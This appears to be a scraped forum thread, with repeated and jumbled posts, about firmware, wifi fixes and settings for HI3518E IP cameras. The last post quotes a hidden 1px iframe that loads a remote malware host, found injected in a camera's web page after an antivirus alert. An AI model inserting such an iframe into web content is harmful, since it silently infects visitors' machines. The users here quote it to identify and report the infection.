To restore wifi in the 6500 board Top-201 camera you can try the firmware in post #740. This firmware is older but has worked for others.Any Idea how to enable and to perform the upgrade or a different version of teh firmware?
To restore wifi in the 6500 board Top-201 camera you can try the firmware in post #740. This firmware is older but has worked for others.Any Idea how to enable and to perform the upgrade or a different version of teh firmware?
Almost all DVR/NVR/IP Camera functions are compiled in its main program - Sofia, so there are only device drivers to play with (lsmod/insmod) or you can kill/start Sofia to see complete logging and detail info about your system.I would like to learn what I usefull stuff I could do with it besides mounting drives....
Try this online editor: http://json.parser.online.fr/3. Yes they are supposed to be edited, however the files when opend in an editor don't make sense to me. Maybe I'm using the wrong editor / wrong mode or other things wrong.
I'm sorry for troubles you met, but i don't own ontopic 6510 camera model. Maybe you should try to update your firmware to the latest commercial release first: http://wiki.xm030.com/index.php/IPC程序下载地址 And only after that try to install any betas.Howver after uploading I'm getting the message "Ugrade failed".
Thank you the top one worked fine and wifi works.jenkins, I believe this is the one you requested. https://dl.dropboxusercontent.com/u/37759044/General_HZXM_IPC_HI3518E_50H10L_S38_RT3070_V4.02.R12.20150317_ALL.zip
Replace the xx in link. I also have an older firmware for wifi with the 6510 board if this doesn't work.
Here is older wifi one for 6510 board camera. https://dl.dropboxusercontent.com/u/37759044/General_HZXM_IPC_HI3518E_53H13_S38_V4.02.R12.20150117_ALL.bin
Links updated
Thanks! I did now. I manged to update to that "official" version yeah.Almost all DVR/NVR/IP Camera functions are compiled in its main program - Sofia, so there are only device drive.......
I'm sorry for troubles you met, but i don't own ontopic 6510 camera model. Maybe you should try to update your firmware to the latest commercial release first: http://wiki.xm030.com/index.php/IPC程序下载地址 And only after that try to install any betas.
00006510 | IPC_HI3518E_50H10L_S38 | http://pan.sohu.net/f/MTY2NzYsaGRkaWQ.htm |
Hi. did you play with the CMS? In the system tray you can slect remote config. Once slected you should get a window. Select the round GEAR icon. Then you should get into the system setting icon collection. select Camera param. Here you can change many settings of the cam. You have to press OK after changes. Then after the OK you can see immideatly the changes on the life streamed picture.Does anyone know which configure file in the camera contains the settings for brightness, contrast, gain, etc.
I know it can be accessed thru csm but my device keeps setting contrast and saturation to 27 on its own which makes the image way to dark.
I guess you could download a 30 day trial of kaspersky, temporarily uninstall avast, then install and update kaspersky to see if it too finds anything.Thank you the top one worked fine and wifi works.
I recently purchased another camera which uses a hi3518e from here http://www.aliexpress.com/item/ABS-Plastic-Material-Wireless-IP-Camera-720P-With-SD-Slot-Max-32G-One-Key-WPS-ONVIF/32590449247.html
Instead of a 6510 this is a 7510. This one is really worrying me though, it works fine through the CMS software but accessing it through the browser gets blocked by avast warning me about "JS:Iframe-BQC [Trj]" which seems to be a common infection in websites to install Trojans. Any chance this is a false positive or is the actual camera trying to give me a virus.
Running KIS 2016 here and no problems with CMSI guess you could download a 30 day trial of kaspersky, temporarily uninstall avast, then install and update kaspersky to see if it too finds anything.
Or alternatively download and install vmware and a windows 7 virtual machine from microsoft to test it in https://dev.windows.com/en-us/microsoft-edge/tools/vms/windows/ and install kaspersky on that.
Had a look and the cameras index page and it contains this at the bottom.If you want to take a small risk, and are familiar with either network packet capture / inspection or HTTP inspection using built-in IE (F12) and Chrome (developer tools) tools, you could from a guest-rights-only account tell your AV it's OK, or disable it, block the camera IP outbound at your router, connect to the camera, and inspect the result for any attempted internet access that should not be there.
You may be able to spot the iFrame and inspect what's in it.
After a quick google, it seems that whoever wrote the firmware has a virus that infects all webpages on their computer. Or (hopefully not) they are intentionally doing this. I have contacted the seller anyway and hopefully he will rectify this.iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1></iframe